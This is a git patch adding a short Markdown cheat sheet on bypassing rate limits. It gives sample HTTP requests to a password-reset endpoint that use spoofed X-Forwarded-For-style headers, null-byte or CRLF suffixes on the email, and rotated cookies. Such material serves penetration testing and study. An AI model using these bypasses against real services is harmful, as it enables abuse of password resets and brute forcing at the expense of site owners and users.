From 753e0e503171edf532ae0468e7409aaa1e02146e Mon Sep 17 00:00:00 2001
From: Muhammad Daffa <36522826+MD15@users.noreply.github.com>
Date: Sat, 19 Sep 2020 06:52:32 +0700
Subject: [PATCH] Bypass Rate Limit [1]

Create Rate Limit Tips and add 3 tips
---
 BypassRateLimit.md | 47 ++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 47 insertions(+)
 create mode 100644 BypassRateLimit.md

diff --git a/BypassRateLimit.md b/BypassRateLimit.md
new file mode 100644
index 0000000..7f1806b
--- /dev/null
+++ b/BypassRateLimit.md
@@ -0,0 +1,47 @@
+# Bypass Rate Limit
+1. Try add some custom header
+```
+X-Forwarded-For : 127.0.0.1
+X-Forwarded-Host : 127.0.0.1
+X-Client-IP : 127.0.0.1
+X-Remote-IP : 127.0.0.1
+X-Remote-Addr : 127.0.0.1
+X-Host : 127.0.0.1
+```
+For example:
+```
+POST /ForgotPass.php HTTP/1.1
+Host: target.com
+X-Forwarded-For : 127.0.0.1
+[...]
+
+email=victim@gmail.com
+```
+
+2. Adding Null Byte ( %00 ) or CRLF ( %09, %0d, %0a ) at the end of the Email can bypass rate limit.
+```
+POST /ForgotPass.php HTTP/1.1
+Host: target.com
+[...]
+
+email=victim@gmail.com%00
+```
+
+3. Try changing user-agents, cookies and IP address
+```
+POST /ForgotPass.php HTTP/1.1
+Host: target.com
+Cookie: xxxxxxxxxx
+[...]
+
+email=victim@gmail.com
+```
+Try this to bypass
+```
+POST /ForgotPass.php HTTP/1.1
+Host: target.com
+Cookie: aaaaaaaaaaaaa
+[...]
+
+email=victim@gmail.com
+```